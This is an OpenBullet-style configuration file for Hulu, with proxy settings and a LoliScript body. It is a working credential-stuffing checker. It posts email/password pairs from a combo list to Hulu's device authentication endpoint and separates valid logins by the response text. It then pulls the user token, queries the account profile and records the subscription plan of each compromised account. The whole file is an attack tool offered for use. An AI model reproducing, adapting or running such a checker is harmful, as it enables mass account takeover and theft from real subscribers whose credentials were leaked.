[SETTINGS]
{
  "Name": "Hulu",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2020-03-02T21:25:04.5830023+01:00",
  "AdditionalInfo": "Captures Subcription type. Free goes to FREE.",
  "Author": "ND03",
  "Version": "1.4.4 [Anomaly]",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "Contour": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "Crop": false,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#Login REQUEST POST "https://auth.hulu.com/v1/device/password/authenticate" 
  CONTENT "affiliate_name=apple&friendly_name=Iphone&password=<PASS>&product_name=iPhone7%2C2&serial_number=00001e854946e42b1cbf418fe7d2dcd64df0&user_email=<USER>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 

#Login KEYCHECK 
  KEYCHAIN Success OR 
    KEY "{\"device_token\":\"" 
  KEYCHAIN Failure OR 
    KEY "{\"message\":\"Your login is invalid. Please try again.\"}" 

#token PARSE "<SOURCE>" JSON "user_token" -> VAR "token" 

#Profile REQUEST GET "https://home.hulu.com/v1/users/self?action=login&user_token=<token>" 
  

#Free KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "FREE" OR 
    KEY "plan_id\":\"262144\",\"" 

#Sub PARSE "<SOURCE>" JSON "plan_id" -> VAR "sub" 

#Sub_translate FUNCTION Translate 
  KEY "66536" VALUE "Hulu with Ads" 
  KEY "197608" VALUE "Hulu (No Ads)" 
  KEY "459752" VALUE "Hulu (No Ads), SHOWTIME速" 
  KEY "1311769576" VALUE "Hulu (No Ads) + Live TV, Enhanced Cloud DVR + Unlimited Screens Bundle, STARZ速" 
  KEY "1049576" VALUE "Hulu, Disney+, and ESPN+" 
  KEY "69211" VALUE "Hulu" 
  KEY "70122" VALUE "Hulu" 
  KEY "69385" VALUE "Hulu" 
  KEY "199844" VALUE "Hulu (No Ads) Free Trial" 
  KEY "839910376" VALUE "Hulu + Live TV, HBO速, CINEMAX速" 
  KEY "200356" VALUE "Hulu (No Ads) Free Trial" 
  KEY "70125" VALUE "Hulu" 
  "<sub>" -> CAP "Sub" 

